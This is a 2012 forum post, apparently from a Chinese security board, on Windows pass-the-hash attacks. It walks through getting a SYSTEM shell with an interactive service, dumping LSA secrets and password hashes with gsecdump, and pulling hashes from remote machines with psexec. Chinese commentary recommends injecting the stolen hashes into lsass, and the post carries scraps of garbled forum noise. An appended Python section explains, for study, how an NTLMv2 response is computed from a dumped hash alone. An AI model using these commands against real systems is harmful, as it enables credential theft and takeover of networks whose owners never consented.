
Hash injection attack

Posted by the thread starter on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

/ l4 f* B1 M8 }  B提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
3 Y6 c- e2 p6 a" f/ |8 X原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
* N9 m# j" t* {1 E8 ]9 e/ W. u7 {' u
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' N- n0 P. {6 z1 v" X
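The post's closing claim (the hash alone is enough, whatever the password length) follows from how the NTLM client side works: it hashes the password to MD4(UTF-16LE(password)), the NT hash, and from then on only that value is used to answer the server's challenge. The block below is an added example written for this page; it is not code from the post, from gsecdump, pshtools or the truesec article, and it talks to no real server. It reimplements MD4 inline (hashlib may not expose MD4 on OpenSSL 3 builds) and computes an NTLMv2 challenge-response per MS-NLMP once from the password and once from nothing but the dumped NT hash hex string, showing the two are identical. The user, domain, challenges, timestamp and target-info values are constructed sample inputs.

```python
"""Why a dumped NT hash is a password equivalent: NTLMv2 from the hash alone.

Added example for this page (not the original post's or truesec's code).
All user/domain/challenge values below are constructed sample data.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF
# Per-round message-word order and rotation amounts (RFC 1320).
_R2_ORDER = [(i % 4) * 4 + i // 4 for i in range(16)]
_R3_ORDER = [(0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4] for i in range(16)]
_R1_S, _R2_S, _R3_S = (3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NTOWFv1 is MD4 over the UTF-16LE password."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    msg = data + b"\x80"                               # pad: 0x80, zeros, 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                            # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & _MASK, _R1_S[i % 4]), b, c
        for i in range(16):                            # round 2
            t = (a + g(b, c, d) + x[_R2_ORDER[i]] + 0x5A827999) & _MASK
            a, b, c, d = d, rotl(t, _R2_S[i % 4]), b, c
        for i in range(16):                            # round 3
            t = (a + h(b, c, d) + x[_R3_ORDER[i]] + 0x6ED9EBA1) & _MASK
            a, b, c, d = d, rotl(t, _R3_S[i % 4]), b, c
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: the 16-byte NT hash that tools like gsecdump -u dump per logon session."""
    return md4(password.encode("utf-16-le"))


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR of the server's TargetInfo (MsvAvNbComputerName=1, MsvAvNbDomainName=2)."""
    v = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(v)) + v


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """NtChallengeResponse per MS-NLMP 3.3.2. Input is the NT hash; no password involved."""
    assert len(nt) == 16 and len(server_challenge) == 8 and len(client_challenge) == 8
    # NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain in UTF-16LE)
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"),
                            hashlib.md5).digest()
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(response_key, server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


def demo_pass_the_hash() -> bool:
    """Constructed scenario: the real client knows the password 'password'; the attacker
    holds only its NT hash as the hex string a dump file shows. Same challenge in, same
    response out, so the server cannot tell them apart."""
    user, domain = "alice", "CORP"                        # constructed sample names
    server_challenge = bytes.fromhex("0123456789abcdef")  # would come from the server
    client_challenge = bytes.fromhex("a1a2a3a4a5a6a7a8")  # would be random on the client
    timestamp = 0x01CDBC1E00000000                         # fixed FILETIME for repeatability
    target_info = av_pair(2, domain) + av_pair(1, "DC01") + struct.pack("<HH", 0, 0)  # MsvAvEOL

    legit = ntlmv2_response(nt_hash("password"), user, domain, server_challenge,
                            client_challenge, timestamp, target_info)
    dumped_nt = "8846f7eaee8fb117ad06bdd830b7586c"  # NT hash of 'password' as dumped; no cracking
    pth = ntlmv2_response(bytes.fromhex(dumped_nt), user, domain, server_challenge,
                          client_challenge, timestamp, target_info)
    return legit == pth


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("hash-only response matches password response:", demo_pass_the_hash())
```

The password never appears on the attacker's side of demo_pass_the_hash(); the dumped hex string is dropped straight into the same key-derivation step the legitimate client performs, which is exactly what tools such as iam do inside lsass. Password length is irrelevant because the NT hash is always 16 bytes and is the only secret NTLM ever uses; the defensive consequences are protecting LSASS memory and limiting where privileged hashes are ever loaded, not longer passwords.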
